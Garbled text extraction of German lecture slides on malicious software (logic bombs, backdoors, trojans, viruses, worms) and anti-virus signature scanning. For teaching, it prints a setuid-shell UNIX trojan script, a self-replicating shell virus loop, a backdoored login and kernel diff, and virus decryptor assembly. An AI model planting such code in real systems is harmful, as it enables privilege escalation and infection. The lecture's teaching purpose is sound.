Überblick. Vorlesung Informationssicherheit. Logische Bomben. Ausschnitt aus dem McAfee-Aktivierungskalender. Hintertüren (Back Doors) Logische Bomben

Größe: px
Ab Seite anzeigen:

Download "Überblick. Vorlesung Informationssicherheit. Logische Bomben. Ausschnitt aus dem McAfee-Aktivierungskalender. Hintertüren (Back Doors) Logische Bomben"

Transkript

1 Überblick Bösartige Software Vorlesung Informationssicherheit Thema 5: Bösartige Software Wirtsprogramm nötig unabhängig Robert Baumgartl Hintertüren Logische Bomben Viren Würmer Trojanische Pferde verbreiten sich selbständig Abbildung: Mögliche Kategorisierung bösartiger Software / 95 lokale vs. entfernte Angriffe on-line- vs. off-line-angriffe 2 / 95 Logische Bomben Ausschnitt aus dem McAfee-Aktivierungskalender Idee: Implantierung bösartigen Codes in Applikationen (oder in das BS), Aktivierung des Codes, sobald eine bestimmte Aktivierungsbedingung erfüllt Aktivierungsbedingung Eintritt eines Datums (logische) Zeitbombe (Kalender von Aktivierungsdaten: meist simples Löschen von Daten häufig eingesetzt, um Rache für Entlassung o. ä. zu üben 2. Mai W97M/Alamat, W97M/Yous, WM/Alliance.A, WM/Envader.A (Intended), WM/Eraser.A:Tw, VBS/Aqui 3. Mai VBS/Aqui, VBS/Zync, WM/Eraser.A:Tw, VBS/Alphae, WM/Envader.A (Intended), Twno.A, WM/BOOM.A;B, WM/BADBOY.A;B;C, WM/FRIDAY.D, WM/FRIDAY.A, WM/Goldsecret.B:Int,WM/CVCK.B;E, W97M/Rapmak.a, W97M/Yous, W97M/Alamat, WM/SHOWOFF.G, W97M/BackHand.A, W97M/Idea.A, W97M/Digma 4. Mai X97M/Jal.a, W97M/Este, W97M/Alamat, W32/SoftSix.worm, W97M/Yous, WM/PHARDERA.C ;D (INTENDED), W97M/Class.B, W97M/Class.D, W97M/Ekiam, WM/Eraser.A:Tw, VBS/Aqui 5. Mai... 3 / 95 4 / 95 Logische Bomben Hintertüren (Back Doors) Beispiel: Donald Gene Burleson, Programmierer für Versicherung USPA & IRA, Ft. Worth, TX entlassen am (Grund: persönliche Schwierigkeiten) am um 3 Uhr werden 68. Datensätze aus der Datenbank des Unternehmens gelöscht Code wurde bei Restaurierung der gelöschten Datensätze gefunden Vor Gericht: Benson, who spent four days testifying about how he uncovered the scheme, said the destructive programs were created Sept. 2 and Sept. 3, 985, on Burleson s computer terminal by someone using Burleson s computer password. (http://catless.ncl.ac.uk/risks/7.56.html) 5 / 95 Idee: Einbau (nichtdokumentierter) Schnittstellen in Software zwecks späteren (unautorisierten) Zugriffes auf das System. Mißbrauch von geheimen Debugging-Schnittstellen schwierig von BS-Seite aus zu erkennen häufiges Relikt aus der Produktentwicklung Behörden sind häufig der Meinung, ein Anrecht auf Hintertüren zu haben Gegenmaßnahme: Code Reviews, Open Source symmetrische vs. asymmetrische Hintertüren viele Würmer installieren Back Doors Klassiker: Back Orifice (http://www.cultdeadcow.com/tools/bo.php) feste Master-BIOS-Passworte, z. B. lkwpeter bei Award BIOS 6 / 95

2 Beispiel einer Hintertür Beispiel 2 (Backdoor im Linux-Kern; nice try) Beispiel: Login-Code mit Hintertür (Tanenbaum: Modern Operating Systems, 2, S. 6) while (TRUE) { printf("login: "); get_string(name); disable_echoing(); printf("password: "); get_string(password); enable_echoing(); v = check_validity(name, password); if (v strcmp(name, "zzzzz") == ) break; } execute_shell(name); From: Larry McVoy [ blocked] Subject: Re: BK2CVS problem Date: Wed, 5 Nov 23 4:23:2-8 On Wed, Nov 5, 23 at 2:58:3PM -8, Matthew Dharm wrote: > Out of curiosity, what were the changed lines? --- GOOD :46: BAD :46: ,6 +,8 schedule(); goto repeat; } + if ((options == ( WCLONE WALL)) && (current->uid = )) + retval = -EINVAL; retval = -ECHILD; end_wait4: current->state = TASK_RUNNING; --- Larry McVoy lm at bitmover.com 7 / 95 8 / 95 Beispiel 2 (Backdoor im Linux-Kern; nice try) Trojanische Pferde ( Trojaner ) jemand modifizierte die Kernelquellen (unautorisiert) fraglicher Code gehört zu sys_wait4(), d. h. dem Systemruf wait4() verkleideter Code ; (current->uid = ) sieht so ähnlich aus wie (current->uid == ) wenn jemand wait4() aufruft und die Optionen WCLONE und WALL sind gesetzt, so erhält der Rufende root-rechte Code wurde beim Review entdeckt ( It s not a big deal, we catch stuff like this, but it s annoying to the CVS users. ) Idee: dem Nutzer ein Programm unterschieben, welches bei Aktivierung unerlaubte Aktionen ausführt anstelle eines Eindringlings führt ein autorisierter Nutzer Schadcode aus Beispiel: gefälschter Login-Bildschirm Klassiker: Compiler, der unbemerkt bösartigen Code in übersetzte Programme einbaut (Ken Thompson: Reflections on Trusting Trust, CACM 4(27), S. 76ff.) vgl. Bundestrojaner 9 / 95 / 95 Beispiel eines simplen UNIX-Trojaners Beispiel eines simplen UNIX-Trojaners (ls benennen und im Pfad eines Nutzers unterbringen) #!/bin/sh cp /bin/sh /tmp/.xxsh chmod u+s,o+x /tmp/.xxsh rm./ls ls $* kopiert und versteckt Shell setzt das SetUID-Bit und macht die Shell für alle ausführbar läuft mit den Rechten des Eigentümers, anstatt mit denen des Aufrufenden Zugriff auf Daten des Angegriffenen (ls benennen und im Pfad eines Nutzers unterbringen) #!/bin/sh cp /bin/sh /tmp/.xxsh chmod u+s,o+x /tmp/.xxsh rm./ls ls $* kopiert und versteckt Shell setzt das SetUID-Bit und macht die Shell für alle ausführbar läuft mit den Rechten des Eigentümers, anstatt mit denen des Aufrufenden Zugriff auf Daten des Angegriffenen / 95 2 / 95 2

3 Beispiel eines simplen UNIX-Trojaners Beispiel eines simplen UNIX-Trojaners (ls benennen und im Pfad eines Nutzers unterbringen) #!/bin/sh cp /bin/sh /tmp/.xxsh chmod u+s,o+x /tmp/.xxsh rm./ls ls $* kopiert und versteckt Shell setzt das SetUID-Bit und macht die Shell für alle ausführbar läuft mit den Rechten des Eigentümers, anstatt mit denen des Aufrufenden Zugriff auf Daten des Angegriffenen (ls benennen und im Pfad eines Nutzers unterbringen) #!/bin/sh cp /bin/sh /tmp/.xxsh chmod u+s,o+x /tmp/.xxsh rm./ls ls $* kopiert und versteckt Shell setzt das SetUID-Bit und macht die Shell für alle ausführbar läuft mit den Rechten des Eigentümers, anstatt mit denen des Aufrufenden Zugriff auf Daten des Angegriffenen 3 / 95 4 / 95 Beispiel eines simplen UNIX-Trojaners (Computer)-Viren (ls benennen und im Pfad eines Nutzers unterbringen) #!/bin/sh cp /bin/sh /tmp/.xxsh chmod u+s,o+x /tmp/.xxsh rm./ls ls $* kopiert und versteckt Shell setzt das SetUID-Bit und macht die Shell für alle ausführbar läuft mit den Rechten des Eigentümers, anstatt mit denen des Aufrufenden Zugriff auf Daten des Angegriffenen A virus is a program that is able to infect other programs by modifying them to include a possibly evolved copy of itself. (Fred Cohen) einige Varianten: Stealth-Viren polymorphe Viren Bootsektor-Viren Macro-Viren 5 / 95 6 / 95 Beispiel für viralen (virulenten?) Code Beispiel für viralen (virulenten?) Code for i in *.sh; do if test "./$i"!= "$"; then tail -n 5 $ cat >> $i; fi done Analyse: beschränkt auf eigenes Verzeichnis mehrfache Infektion wahrscheinlich kein Payload leicht zu analysieren ;-) for i in *.sh; do if test "./$i"!= "$"; then tail -n 5 $ cat >> $i; fi done Analyse: beschränkt auf eigenes Verzeichnis mehrfache Infektion wahrscheinlich kein Payload leicht zu analysieren ;-) 7 / 95 8 / 95 3

4 Beispiel für viralen (virulenten?) Code Beispiel für viralen (virulenten?) Code for i in *.sh; do if test "./$i"!= "$"; then tail -n 5 $ cat >> $i; fi done Analyse: beschränkt auf eigenes Verzeichnis mehrfache Infektion wahrscheinlich kein Payload leicht zu analysieren ;-) for i in *.sh; do if test "./$i"!= "$"; then tail -n 5 $ cat >> $i; fi done Analyse: beschränkt auf eigenes Verzeichnis mehrfache Infektion wahrscheinlich kein Payload leicht zu analysieren ;-) 9 / 95 2 / 95 Beispiel für viralen (virulenten?) Code Ein (etwas) besserer Virus for i in *.sh; do if test "./$i"!= "$"; then tail -n 5 $ cat >> $i; fi done Analyse: beschränkt auf eigenes Verzeichnis mehrfache Infektion wahrscheinlich kein Payload leicht zu analysieren ;-) for i in *.sh; do if test "./$i"!= "$"; then HOST=$(echo -n $(tail - $i)) VIR=$(echo -n $(tail - $)) if [ "$HOST"!= "$VIR" ] then tail -n $ cat >> $i; fi fi done 2 / / 95 Würmer Komponenten eines Wurms An independently replicating and autonomous infection agent, capable of seeking out new host systems and infecting them via the network. (Jose Nazario: Defence and Detection Strategies against Internet Worms, Artech House, 24) Bekannte Vertreter: W32.Blaster Melissa Mydoom Sasser Conficker. Aufklärung neuer Hosts als potentielle Angriffsziele IP-Adreßräume (partiell) durchsuchen lokale Suche in (z. B.) Konfigurationsdateien OS Fingerprinting, um BS-Typ und -Version zu ermitteln 2. Angriffscode Remote Exploit bekannter Schwachstellen Trojanisches Pferd (z.b. Mail mit attached Binary) benötigt für jede anzugreifende Plattform Exploit 3. Kommunikation z. B. mittels ICMP, UDP,..., über verdeckte Kanäle Verbergen beteiligter Prozesse und Sockets mittels Kernelmodul oder durch Störung von Überwachungssoftware 23 / / 95 4

5 Komponenten eines Wurms Weitere Begriffe 4. Kommandoschnittstelle interaktiv oder indirekt (script-gesteuert) typische Kommandos: Up-/Download von Dateien, Flut-Ping, Generierung von HTTP-Requests, Verwaltung der erfolgreich angegriffenen Hosts verteilte oder zentralisierte Datenbank Liste aller befallenen Rechner in privatem IRC-Channel Ransomware (kryptografisch sichere) Verschlüsselung des Massenspeichers Entschlüsselung nur nach Zahlung eines Lösegelds z. B. TROJ_PGPCODER.A Rootkit Software, die zur Verschleierung der Kompromittierung eines Rechners dient Spyware Keylogger Hoax (z. B. Good-Times- Virus ) 25 / / 95 GoodTimes FYI, a file, going under the name "Good Times" is being sent to some Internet users who subscribe to on-line services (Compuserve, Prodigy and America On Line). If you should receive this file, do not download it! Delete it immediately. I understand that there is a virus included in that file, which if downloaded to your personal computer, will ruin all of your files. [...] Computerviren 27 / / 95 Literatur Was ist ein Virus? Eric Filiol: Computer Viruses: From Theory to Appliactions. Springer, 25 Peter Szor: The Art of Computer Virus Research and Defense. Addison-Wesley, 25 Mark Ludwig: The Giant Black Book of Computer Viruses. American Eagle Publications, 995 John Aycock: Computer Viruses and Malware. Springer, 26 Definition A virus is a program that reproduces its own code by attaching itself to other executable files in such a way that the virus code is executed when the infected executable file is executed. Anmerkungen: Implementationssprache irrelevant keine Schadroutine nötig Wurm ist auch ein Virus 29 / 95 3 / 95 5

6 Bestandteile eines Virus Analyse: Blackwolf-Virus in C Infektionsmechanismus: Aufsuchen von Zielen, Replikation Routine(n) zum Verbergen: vor dem Nutzer oder Anti-Viren-Software Trigger: Entscheidung, ob bzw. wann Nutzlast aktiviert wird Nutzlast: zufälliger oder beabsichtigter Schaden oder Spaß Beispiel: blackwolf.c (http://vx.netlux.org/lib/vbw6.html) sucht alle.com-dateien im aktuellen Verzeichnis und infizierte diese (auf einmal) schnelle Infektion überschreibender Virus mäßig destruktiv: Virus-Code überschreibt Anfang der Ziele verbirgt sich nicht keine Nutzlast infiziert bei jeder Aktivierung, Ziele wachsen nicht, da überschreibend 3 / / 95 Klassifizierung von Viren I nach dem potentiellen Ziel Klassifizierung von Viren II nach der Strategie des Verbergens Boot-Sektor (allgemeine) ausführbare Dateien (.BAT,.EXE,.VBS, PostScript, ELF,.sh,.py,... ) (spezielle) Dateien bestimmter Applikationen, die mit Makrosprache ausgerüstet sind, z. B. Microsoft Office Makroviren (data file infectors) keine verschlüsselnd (besser: obfuscating) Stealth: Virus versucht, sich sowie die Infektion zu verbergen Oligomorphismus: Virus kommt in (endlich) vielen Formen vor Polymorphismus: Virus kommt in (fast) unendlich vielen Formen vor Metamorphismus: Virus wechselt seine Gestalt 33 / / 95 Klassifizierung von Viren III nach der Schadfunktion (Nutzlast, Payload) Nichtdestruktive Schadfunktion von W95/Marburg. keine Schadfunktion typisch für Proof-of-Concept-Viren trotzdem nicht harmlos (Ressourcenverbrauch, Datenverlust infolge Absturzes,... ) 2. unbeabsichtigte Schadfunktion ( aus Versehen ) Beispiel: Stoned-Virus schreibt Boot-Sektor an einen (vermeintlich) sicheren Platz, Ende des Wurzelverzeichnisses Verzeichniseinträge werden überschrieben, falls sehr viele Dateien im Root-Verzeichnis 3. nichtdestruktive Schadfunktion Yankee Doodle Cascade (Herbstlaub) W95/Marburg: zeichnet 256 Icons (IDI_HAND) zufällig auf den Bildschirm (http://www.sophos.com/images/viruses/w95-marburg.gif ) 35 / / 95 6

7 Klassifizierung von Viren III nach der Schadfunktion (Nutzlast, Payload) 4. mäßig destruktive Schadfunktion ( mildly damaging ) Löschen z. B. von Anti-Viren Software aus Speicher und von Festplatte W95/HPS kehrt samstags unkomprimierte BMP-Bilder um (von rechts nach links) WM/Wazzu.A (996), bewegt -3 Wörter in einem Office-Dokument, fügt ab und zu das Wort Wazzu ein 5. stark destruktive Schadfunktion a) schnelles Überschreiben von Daten Michelangelo: überschreibt erste 7 Sektoren jeder Spur der Köpfe bis 4 des Bootmediums Überschreiben des MBR oder der FAT (Töltögetö-Virus) AntiPascal: löscht Pascal-Quellfiles (.PAS) Stark destruktive Schadfunktionen b) langsames Überschreiben von Daten (Data Diddler) Dark.Avenger.8.A: schreibt "Eddie lives... somewhere in time!" in zufälligen Sektor Ripper: tauscht 2 Datenworte in einem zufällig gewählten Sektor der Festplatte aus Gefahr, daß manipulierte Daten ins Backup wandern c) Datenverschlüsselung Disk Killer: XORt alle Sektoren des Datenträgers KOH: verschlüsselt Datenträger mittels IDEA (Idee: Datenschutz!), guter Virus!? d Störung der Hardware AntiCMOS: beschreibt CMOS-RAM (setzt CMOS-Passwort) W95/CIH: überschreibt (u. a.) Teile des BIOS im Flash-Speicher 37 / / 95 Mehrfachinfektion Überschreibender Virus Header Header Mehrfachinfektion muß vermieden werden, da diese zu unbeabsichtigtem Fehlverhalten und auffälligem Wachstum infizierter Dateien führen, was die Detektierung erleichtert. Virus muß infizierte von nichtinfizierten Dateien unterscheiden können Wenn ein Virus dies kann, so kann dies (potentiell) auch Anti-Viren-Software! Code Virus Infektion Header Code und Daten Code überschriebener Teil der Zieldatei nichtüberschrieben ausführbare Zieldatei Abbildung: Prinzip des überschreibenden Virus 39 / 95 4 / 95 Überschreibender Virus Anhangvirus (Appender/Prepender) Virus Größe des Ziels ändert sich nicht auch ohne Payload bösartig: Überschreiben führt zu Nichtausführbarkeit des Ziels auch Überschreiben am Ende möglich (Sprung zum Virus und danach zum Wirtsprogramm) Virus muß sehr klein sein Zieldatei Infektion 2.. infizierte Zieldatei Aufrufreihenfolge Abbildung: Prinzip des sich anhängenden Virus 4 / / 95 7

8 Anhangvirus Companion Virus (Begleiter) Append: kleiner Teil des Targets wird mit Sprung zum Virus überschrieben während Ausführung des Virus muss Zieldatei wieder restauriert werden Auch Voranstellen des Virus möglich, aber ungleich schwieriger Größe der Zieldatei ändert sich Idee: Anlegen einer zusätzlichen Datei ( Begleiter ), die mit Zieldatei (logisch) verbunden ist wenn Zieldatei ausgeführt wird, wird zunächst stets der Begleiter, der Virus, ausgeführt Integrität des Zieles bleibt erhalten, jedoch entstehen neue Dateien 43 / / 95 Companion Virus Exec. 2. Virus Virus Infektion Zieldatei Zieldatei infizierte Zieldatei Abbildung: Prinzip des Companion Virus Companion Virus Implementierungstechniken Nutzung einer Ausführungspräzedenz (z. B. MS-DOS: file.com > file.exe > file.bat) Nutzung der Hierarchie beim Suchen ausführbarer Dateien Datei gleichen Namens wie das Ziel in ein Verzeichnis schreiben, das im PATH vor dem Verzeichnis des Zieles steht Manipulation der Indexstruktur der Zieldatei Überschreiben der Startclusternummer des Zieles mit Startclusternummer des Virus (und entsprechende Verkettung) Umbenennung des Zieles Virus kopiert sich, benennt sich wie Ziel, und ruft dieses nach eigener Aktivität betriebssystemunabhängig 45 / / 95 Quellcode-Virus Autoreplizierende Programme Idee: Manipulation von Quellcode: Einfügen virulenten Codes Vorteil: infizierte Binärdateien sind vollständig intakt vgl. Ken Thompson: Reflections on Trusting Trust. CACM 4(27) 984, S. 76ff. Gegenmaßnahmen: Code Review Integritätsprüfungen von Quelldateien Definition (Quine) Ein Quine ist ein Programm, das seinen eigenen Quellcode ausgibt. ziemlich schwierig für compilierte Sprachen zu schreiben (probieren Sie es!) nicht so schwierig für interpretierte Sprachen Beispiel in C: char f ="char f=%c%s%c ; main ( ) { printf ( f,34, f,34,) \ ;}% c " ; main ( ) { p r i n t f ( f,34, f,34,) ; } Literatur: david/computers/quine.html 47 / / 95 8

9 Ein Quine in L A T E X Quines in UNIX-Shell \documentclass{book}\pagestyle {empty}\def\a{\ensuremath{\backslash}}\def\f {\def\b{\a}\def\c{\{}\def\d{\}}\def \e{\\}\noindent\g\b def\b g\c\def\b{\a b }\def\c{\a c }\def\d{\a d}\def\e{\a e \\}\g\}\a begin\{document\}\a f\a end \{document\}}\def\g{ \b documentclass\c book\d\b pagestyle\e \c empty\d\b def\b a\c \b ensuremath\c \b backslash\d\d\b def\b f\e \c \b def\b b\c \b a\d\b def\b c\c \b \c \d\b def\b d\c \b \d\d\b def\e \b e\c \b \b \d\b noindent\b g\b b def\b b g\b c\b def\b b\c \b a b\e \d\b def\b c\c \b a c \d\b def\b d\c \b a d\d\b def\b e\c \b a e\e \b \b \d\b g\b \d\b a begin\b \c document\b \d\b a f\b a end\e \b \c document\b \d\d}\begin{document}\f\end{document} Beispiel : #!/bin/bash read foo<< EOF ;eval $foo echo #!/bin/bash ;echo read foo<< " EOF " ;eval $foo \ ;echo $foo;echo EOF EOF Beispiel 2: #!/bin/bash cat $ 49 / 95 5 / 95 Funktionsweise eines Quellcode-Virus Quellcode-Virus manipuliert. Virus kreiert Quellcodefile (virus.h), 2 Komponenten: Code des Virus (, der in Zieldatei eingebunden und übersetzt wird zu infiziertem Binärfile) gleicher Code in Form einer Datenstruktur (z. B. Array) für weitere Generationen des Virus = Quine 2. Infektion eines Zieles: #include "virus.h" Einfügen mindestens eines Aufrufs des Viruscode in Ziel 3. Virus selbst kann Übersetzungslauf der infizierten Quelle veranlassen Virus aktiver Virus (Binärcode) Zieldatei (Quellcode) Übersetzung infizierte Zieldatei (Binärcode) manipuliert manipuliert Zieldatei Zieldatei Abbildung: Prinzip eines Quellcode-Virus 5 / / 95 Boot-Viren Residente Viren 3 Typen BIOS-Virus manipuliert BIOS im Flash-Speicher kann nicht durch Antivirus-Software detektiert werden unterliegt keinen Zugriffsrestriktionen bei Festplatte Beispiel: W95/CIH Boot-Sektor- bzw. MBR-Virus infiziert genau einen Sektor maximale Größe 52 Byte nachladender Boot-Sektor-Virus verbleiben nach Aktivierung im Speicher Infektionsgeschwindigkeit muss künstlich gedrosselt werden MS-DOS: Terminate and Stay Resident (TSR) Windows: VXD (virtueller Gerätetreiber) UNIX: relativ schwierig als Daemon (root-privileg erforderlich) als Hintergrundprozess, gestartet durch.profile Ymum2 53 / / 95 9

10 Verschlüsselung Ein einfacher Decryptor für.exe-dateien Ziel: Erschweren von Reverse Engineering Detektierung Identifikation des genauen Virustyps Entschlüsselung muss schnell gehen! darf keine Nutzereingaben o. ä. erwarten XOR-Verschlüsselung gern genutzt: benötigt eine Maschineninstruktion Schlüssel für Ver- und Entschlüsselung gleich DECRYPT: mov si, OFFSET START mov di, OFFSET START mov cx, VIR_SIZE ELP: lodsb xor al,93h stosb loop ELP START: Virus Body Starts here... lodsb load byte at DS:SI into AL stosb store AL into DS:DI loop <label> dec CX, jump <label>, if CX 55 / / 95 Der Decryptor des Herbstlaub-Virus Variationen des Themas lea si,start mov sp,682 DECRYPT: xor [si],si xor [si],sp inc si dec sp jnz DECRYPT START:... erster bekannter verschlüsselnder Virus START ist Beginn des verschlüsselten Teils, dynamisch gesetzt SP als Zähler missbraucht einfachste Form: lineare Verschlüsselung (Byte nach Byte), vorwärts Verschlüsselung rückwärts (Decryptor steht am Ende des Virus) mehrere verschachtelte Entschlüsselungsschleifen semizufällige Auswahl des zu entschlüsselnden Bytes 57 / / 95 Formen von Entschlüsselungsschleifen Anmerkungen Decryption Loop Decryption Loop Virus Body Virus Body Decryption Loop n Virus Body Bitmuster der Entschlüsselungsschleife reicht manchmal zur Detektierung eines Virus, da diese Funktionen eigentlich nur in Viren vorkommen präzise Identifikation oft unmöglich, da weniger Typen von Entschlüsselungsschleifen als Virentypen Verschlüsselung Basis für Vielgestaltigkeit Decryption Loop Decryption Loop 2 59 / 95 6 / 95

11 Beispiel für oligomorphen Decryptor Erkennen Sie, was dieser Code tut? DECRYPT: xor [esi],al inc esi inc al dec ecx jnz DECRYPT jmp START START:... Beispiel aus W95/Memorial sliding decryption key 2 (leicht) verschiedene Schleifen DECRYPT: xor [esi],al inc esi inc al loop DECRYPT jmp START START:... inc si mov ax,e9b clc mov di,2a mov cx,57 LABEL: xor [di],cx sub bx,dx xor bx,cx sub bx,ax sub bx,cx xor dx,cx xor [di],ax inc di clc inc ax loop LABEL START: 6 / / 95 Es ist ein Dekryptor. Beispiel für polymorphen Virus: 26 inc si mov ax,e9b clc mov di,2a mov cx,57 LABEL: xor [di],cx sub bx,dx xor bx,cx sub bx,ax sub bx,cx xor dx,cx xor [di],ax inc di clc inc ax loop LABEL START: Einfügen sogenannter junk instructions verkompliziert Code Instruktionen in Prolog und Schleife können jeweils miteinander permutiert werden 2 Register mit Schlüsseln, ax und cx jedes Wort wird doppelt verschlüsselt beide Schlüssel ändern sich stetig (cx implizit durch loop) di zeigt auf zu verschlüsselndes Wort einer der ersten echt polymorphen Viren Polymorphe Viren können eine unübersehbare Vielzahl von Dekryptor-Routinen besitzen. 63 / / 95 Weitere Aspekte polymorpher Viren langsame Polymorphie: Gestalt des Virus ändert sich in großen Zeiträumen schlecht zu testen für AV-Software Mutation Engines: übernehmen einen unverschlüsselten Virus und generieren einen polymorphen Decryptor dafür (Beispiel: The Dark Avenger Mutation Engine) Metamorphe Viren: anstatt des Dekryptors wird der Körper des Virus modifiziert (keine Verschlüsselung mehr nötig) Weitere Techniken Code Interlacing (Hole Cavity Infection); im Portable Executable (PE) - Binärformat Armoured Virus: be- oder verhindert die Analyse des Binärcodes erkennen, wenn im Debugmodus abgearbeitet (beendet sich selbst, blockiert Tastatur, rebootet) Fake Code kryptographische Techniken Retrovirus: Nutzen spezifische Erkennungsschwächen von Anti-Virus-Software Multiformatvirus kann verschiedene Dateitypen infizieren (z. B. iwinux/lindose, infiziert PE und ELF) Slow vs. Rapid Virus Manipulation des Environments kooperierende oder kombinierte Viren 65 / / 95

12 Anti-Virus-Software Scanner Zielstellung: Erkennung keine False Positives keine False Negatives Identifikation, Entfernung von Viren Scanner: Programm zur Identifikation und Eliminierung bzw. Reparatur infizierter Dateien on-demand durch den Nutzer gerufen bzw. zu ausgezeichneten Zeitpunkten (Systemstart) on-access resident bei jedem Zugriff, Öffnen, Schließen z. B. als Filter-Dateisystem-Treiber unter Windows Problem: Netzwerk-Freigaben 67 / / 95 Signatur eines Virus Definition (Signatur eines Virus) Die Signatur eines Virus ist eine endliche Sequenz von Bytes, die einen bestimmten Virus eineindeutig identifiziert Beispiel: 4 B8 2E 7BB 2 33C9 8BD 49C identifiziert den Stoned-Virus Länge der Signatur? Wildcards? durchsucht werden alle anfälligen Dateien/Festplattenbereiche Problem: Performance! Algorithmus von Aho-Corasick (975) Zur bibliografischen Suche other hi hip hips h i 3 p 5 s 8 c t hit hi chip,hip 2 h 4 i 7 p 9 Abbildung: Beispiel eines Zustandsautomaten Fehlerzustand Folgezustand 3 5 Tabelle: Zugehörige Fehlerfunktion 6 69 / 95 7 / 95 Algorithmus von Aho-Corasick (975) Input Vorher Nachher Ausgabe s c 2 h 2 4 i 4 7 hi p 7 9 chip, hip h 9 i 3 hi Tabelle: Beispiel parallele Suche nach allen eingebauten Mustern findet auch überlappende Muster Anwendung z. B. in fgrep und snort Literatur: Alfred V. Aho, Margaret J. Corasick: Efficient string matching: An aid to bibliographic search. Communications of the ACM 8(6): / 95 Algorithmus von Veldman Idee: Repräsentation der Signaturen durch kurze (z. B. 4 Byte) charakteristische Sequenzen, Filterung mittels zweier Hashtabellen wenn erste beide Bytes in Hashtabelle zu finden sind, wird in 2 Hashtabelle nach Bytes 3 und 4 gesucht Treffer verlinkt verkettete Liste mit Signaturen, die dann sequentiell durchsucht werden 2-Byte-Sequenzen für kurze Signaturen ebenfalls möglich ideal für Suche mittels Wildcards Beispielzeichenkette für Automat: blar fo gree blar?g foo greep greed agreed 72 / 95 2

13 Algorithmus von Veldman Algorithmus von Veldman Suchfunktion: foreach byte sequence bb2b3b4 in input: if HT[bb2] == then if two-byte-pattern then signatures = HT[bb2]->ST match(signatures) else if HT2[b3b4] == then signatures = HT2[b3b4]->ST match(signatures) Hash Table HT aa ab ac bl fo gr Hash Table 2 HT2 aa ab ac ar ee Signature Table ST bla?r greep foo green Abbildung: Beteiligte Datenstrukturen (Beispiel) agreed 73 / / 95 Algorithmus von Veldman Algorithmus von Wu und Manber Anmerkungen: inexakte Filterung: im Beispiel würden z. B. bleed oder grar als gültige Signatur erkannt werden folgendes Matching schliesst diese aber wieder aus match-operation der Signaturen erfolgt sequentiell Idee: Verbesserung von Veldman, irrelevante Bytes in der Eingabe überspringen erlaubt ebenfalls Wildcards Anwendung: agrep (unscharfe Suche) Literatur: Udi Manber, Sun Wu: Fast text search allowing errors. Communications of the ACM, 35(), October / / 95 Algorithmus von Wu und Manber Suchfunktion i = MINLEN while i < n: shift = SHIFT [b[i-],b[i]] if shift = : signatures = HASH[b[i-],b[i]] match(signatures) shift = i = i + shift MINLEN minimale Länge der Mustersubstrings (foo, greed,... ) b[i] Bytes der zu durchsuchenden Zeichenkette ( i < n) SHIFT Anzahl Bytes, die übersprungen werden können HASH Hashtabelle für Signaturen Algorithmus von Wu und Manber Shift Table SHIFT ab ag bl fo gr la oo re xx 2 2 Hash Table 2 HASH gr la oo re agreed bla?r foo greep Abbildung: Beteiligte Datenstrukturen (Beispiel) green 77 / / 95 3

14 Algorithmus von Wu und Manber Beispieleingabe Algorithmus von Wu und Manber Konstruktion der Datenstrukturen MINLEN=3 Leserichtung b[] b[] b[2] b[3] b[4] b[5] b[6] b[7] c a b x x f o o. Ermittlung von MINLEN 2. Initialisierung von SHIFT mit MINLEN- 3. Füllen von SHIFT SHIFT[xy] = MINLEN - q xy q xy : maximale rechte Endposition von xy in allen betreffenden Pattern, gezählt ab initiale Shift: +2 Shift: +2 Position Aufgabe: Was passiert mit der Eingabe cabxloo? Shift: + Match Beispiel: xy Signatur q xy bl bla 2 la bla 3 gr agr,gre 3 4. Konstruktion der Hashes, wenn SHIFT[xy] == 79 / 95 8 / 95 Probleme von Signaturen Scanning: Leistungssteigerung zu kurz: zu viele false positives Fehlidentifikation von Virentypen zu lang: aufgeblähte Datenbank langsame Suche Virusvarianten nicht als solche erkannt generell: ständiges Update der Signaturdatenbank nötig zeitliche Lücke zwischen Auftreten eines neuen Virus Erkennung des Virus Analyse des Virus und Generierung einer Signatur Reduktion der zu durchmusternden Daten: nicht komplette Dateien durchsuchen (Top- and Tail-Scanning) Start des Scans am Einsprungpunkt der Applikation Fixed Point Scanning: wenn exakte Position der Signatur (innerhalb des Virus) bekannt ist nur soviel durchmustern, wie der gesucht Virus lang ist Reduktion der Scan-Durchläufe: nur befallbare Dateien durchmustern (ausführbare, Dokumente) Ergebnisse früherer Scans speichern, nur erneut scannen, wenn Datei modifiziert wurde (Erkennung der Modifikation? Checksummen? Integritätssicherung der Datenbank) 8 / / 95 Exakte Identifikation Beispiel: Stoned-Virus Idee: Alle konstanten Teile eines Virus ermitteln (Map). Checksumme (z. B. CRC) über Map Voraussetzungen: Virus vollständig analysiert und verstanden Variablen identifiziert, Länge des Virus ermittelt. Variablen: seg :7c bodyzero : seg :7 c jmp f a r p t r 7ch :5 seg :7 c5 jmp s t a r t seg :7 c5 ; seg :7 c8 f l a g db ; ; hard d isk or d i s k e t t e? seg :7 c9 i n t 3 o f f dw 25h ; DATA XREF seg :7 cb int3seg dw c8h ; DATA XREF seg :7 cd j u m p s t a r t dw e4h ; o f f s e t to make seg :7 cd ; i n t e r segment jump seg :7 cf virusseg dw 9f8h ; DATA XREF seg :7 c b o o t o f f dw 7ch ; to boot seg :7 c3 botseg dw ; segment seg :7 c5 ; seg :7 c5 push ds seg :7 c6 push ax Anfang des Stoned-Virus, nach [Szor5] 83 / / 95 4

15 Beispiel: Stoned-Virus Identifikation von Varianten 2. Länge des Virus: seg :7 cd3 mov cs, B8h ; 44 bytes seg :7 cd6 push cs seg :7 cd7 pop ds seg :7cd8 xor si, si ; copy code to memory seg :7cda mov di, si seg :7 cdc c l d seg :7 cdd rep movsb seg :7 cdf jmp dword p t r cs : dh Kopierroutine, nach [Szor5] Map des Virus: x x7, xd xe, x-x87 Virus Name: Stoned.A Virus Map: x-x7 xd-xe x-xb7 Checksum: x3523d929 :8 333DBFECCD3EB C57596F Your P : E6F F6E65642 C is now Stoned! :A 7DAA4C C D4...LEGALISE MA :B 52494A5544E42 RIJUANA!... Ausschnitt aus Stoned.A Virus Name: Stoned.B Virus Map: x-x7 xd-xe x-xb7 Checksum: x3523c769 :8 333DBFECCD3EB C57596F Your P : E6F F6E65642 C is now stoned! :A 7DAA4C C495A454D4...LEGALIZE.MA :B 52494A5544E42 RIJUANA!... Ausschnitt aus Stoned.B 85 / / 95 Probleme mit polymorphen Viren Nutzung von statischen Heuristiken MOV AX, 65A XCHG DX, AX MOV AX, DX MOV BP, AX ADD EBP, 69BDAA5F MOV BX, BP XCHG BL, DH MOV BL, BYTE PTR DS:[43A5] XCHG BL, DH CMP BYTE PTR GS:[B975], DH SUB DH, BYTE PTR DS:[63] MOV AH, DH INT 2 Problem: welchen Wert 